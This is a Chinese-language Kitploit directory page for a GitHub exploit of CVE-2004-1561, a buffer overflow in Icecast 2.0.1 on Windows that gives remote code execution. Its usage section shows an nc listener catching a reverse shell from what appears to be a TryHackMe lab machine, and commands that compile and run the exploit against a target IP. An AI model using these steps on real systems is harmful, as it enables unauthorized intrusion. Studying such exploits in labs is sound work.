Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2004-1561-Icecast-Header-Overwrite-buffer-overflow-RCE-2.0.1-Win32- — CVE-2004-1561 Icecast 头部覆盖缓冲区溢出漏洞在 Windows 上的利用程序,通过反向 Shell 载荷实现远程代码执行。 | Kitploit
工具/GitHubGitHub/danyw24/cve-2004-1561-icecast-header-overwrite-buffer-overflow-rce-2.0.1-win32-
Payload生成漏洞分析漏洞利用渗透测试
GitHubdanyw24/cve-2004-1561-icecast-header-overwrite-buffer-overflow-rce-2.0.1-win32-

CVE-2004-1561-Icecast-Header-Overwrite-buffer-overflow-RCE-2.0.1-Win32-

CVE-2004-1561 Icecast 头部覆盖缓冲区溢出漏洞在 Windows 上的利用程序,通过反向 Shell 载荷实现远程代码执行。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
11年前尚未审核

CVE-2004-1561-Icecast-Header-Overwrite-buffer-overflow-RCE-2.0.1-Win32-

使用

image

使用 Ncat 监听反向 Shell

root@kitploit:~
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

使用 568-edit

基于原始漏洞利用 568 Exploit

root@kitploit:~
gcc ./568-edit.c -o 568 & chmod 775 ./568
root@kitploit:~
./568 127.0.0.1 (Target IP)
下载工具